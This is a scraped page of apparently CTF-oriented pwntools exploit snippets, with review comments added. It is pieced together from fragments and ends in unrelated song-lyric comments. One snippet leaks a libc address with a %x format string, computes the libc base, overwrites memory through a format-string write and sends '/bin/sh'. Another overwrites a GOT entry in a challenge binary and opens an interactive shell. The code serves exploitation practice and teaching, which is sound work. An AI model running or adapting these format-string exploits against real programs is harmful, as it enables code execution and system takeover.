leak = leak.split(b"xxxxxxx")[1]
# NOTE(review): `leak` is parsed but never used within the visible lines — the
# snippet appears truncated here.
leak = int(leak, 0x10)
示例#23
0
# Fragment of a larger script: `target` and `sf` are defined earlier (not shown).
# Leak step: send a positional `%x` directive bracketed by two markers, then cut
# the hex text the program echoes out from between the markers.
leakPayload = b""
leakPayload += b"xxxxxxx"
leakPayload += b"%2$x"
leakPayload += b"yyyyyyy"
target.sendline(leakPayload)
leak = target.recvuntil(b"yyyyyyy")
# NOTE(review): bytes.strip() removes a character *set*, not the literal suffix;
# safe only because hex digits never contain 'y'. `removesuffix` (3.9+) is exact.
leak = leak.strip(b"yyyyyyy")
# Keep what follows the first marker — assumes the marker occurs once in the echo.
leak = leak.split(b"xxxxxxx")[1]
leak = int(leak, 0x10)

# 0x1e9580 is an unnamed magic offset from the leaked value to the libc base;
# it is only valid for one specific libc build — record which one.
libc_base = leak - 0x1e9580
print("libcBase is: %s" % hex(libc_base))
# value is libc-relative (value_base=libc_base); address is used as given.
# Keyword semantics are defined by sf and not visible here.
fs = sf.WriteFmtStr(arch=32,
                    value=0x458b0,
                    address=0x804b2a0,
                    offset=0x6,
                    printed_bytes=0x0,
                    alignment_bytes=0x0,
                    value_base=libc_base,
                    address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)

# NOTE(review): str argument — pwntools accepts it but warns on Python 3; the
# "\x00" encodes to a single NUL byte, so b"/bin/sh\x00" is the exact equivalent.
target.sendline("/bin/sh\x00")

# Exploit Verification starts here 15935728


def handler(signum, frame):
    """Intended SIGALRM handler: abort the run by raising instead of hanging.

    The ``signal.signal`` registration is not part of this snippet.

    Args:
        signum: delivered signal number (ignored).
        frame: interrupted stack frame (ignored).

    Raises:
        Exception: always, with the message "Timed out".
    """
    del signum, frame  # unused; the handler's only job is to raise
    raise Exception("Timed out")

示例#24
0
#
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings

from pwn import *

import sf

# Exploit script for "chall-test_backdoor17-bbpwn": one format-string write with
# absolute value/address (both bases 0), built by the project `sf` helper.
target = process("./chall-test_backdoor17-bbpwn")
gdb.attach(target)

# NOTE(review): constructed but never used in this script.
bof_payload = sf.BufferOverflow(arch=32)

# printed_bytes=0x46 is the largest such value on this page; its meaning is
# defined by sf and not visible here — confirm before changing it.
fs = sf.WriteFmtStr(arch=32,
                    value=0x804870b,
                    address=0x804a028,
                    offset=0xa,
                    printed_bytes=0x46,
                    alignment_bytes=0x0,
                    value_base=0,
                    address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)

# Hand the connection to the user.
target.interactive()

# +------------------------------------------------+
# | Artist: Godsmack                               |
# +------------------------------------------------+
# | Song: I Stand Alone                            |
# +------------------------------------------------+
# | I've told you this,                            |
# | once,                                          |